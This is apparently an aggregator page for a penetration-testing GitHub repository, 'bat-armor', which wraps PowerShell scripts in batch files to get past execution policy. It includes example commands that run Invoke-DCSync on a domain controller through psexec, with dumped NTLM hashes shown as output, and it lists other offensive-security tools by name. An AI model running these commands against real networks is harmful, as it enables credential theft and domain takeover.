klsecservices/bat-armor klsecservices/bat-armor

  • Stars
    star
    146
  • Rank 252,769 (Top 5 %)
  • Language
    Python
  • License
    MIT License
  • Created almost 8 years ago
  • Updated almost 7 years ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
klsecservices/bat-armor
github

klsecservices

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

Encode powershell payload into bat files

Bat Armor

Bypass PowerShell execution policy by encoding ps script into bat file.

Example

Run Invoke-DCSync.ps1 to get krbtgt hash:

$ python bat_armor.py --script-path Invoke-DCSync.ps1\
--launch-string "Invoke-DCSync -users krbtgt,administrator -alldata"\
--out krbtgt.bat --target-filepath 'c:\windows\krbtgt.bat'

$ python psexec.py pentesto.loc/administrator@dc01 -c krbtgt.bat
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.16-dev - Copyright 2002-2016 Core Security Technologies

...

Hash NTLM: b8aa706788a3d8c6ac9a96684d7ff330
ntlm- 0: b8aa706788a3d8c6ac9a96684d7ff330
lm - 0: 6829621ea2044b0e931f83e0b62b4b8c

More Repositories

1

rpivot

socks4 reverse proxy for penetration testing
Python
555
star
2

Invoke-Vnc

Powershell VNC injector
C
332
star
3

s7scan

The tool for enumerating Siemens S7 PLCs through TCP/IP or LLC network
Python
133
star
4

ios_mips_gdb

Cisco MIPS debugger
Python
59
star
5

Publications

34
star
6

SPPA

PHP
8
star
7

eap-mirror

Python
8
star
8

Advisories

7
star
9

sarian_os

4
star
10

desert

Java
3
star
11

whois-full-txt-search

Full text search in WHOIS (RIPE)
Python
3
star
12

hp-sitescope-decryptor

HP SiteScope Configuration Decryptor
JavaScript
1
star
13

racfudit

Go
1
star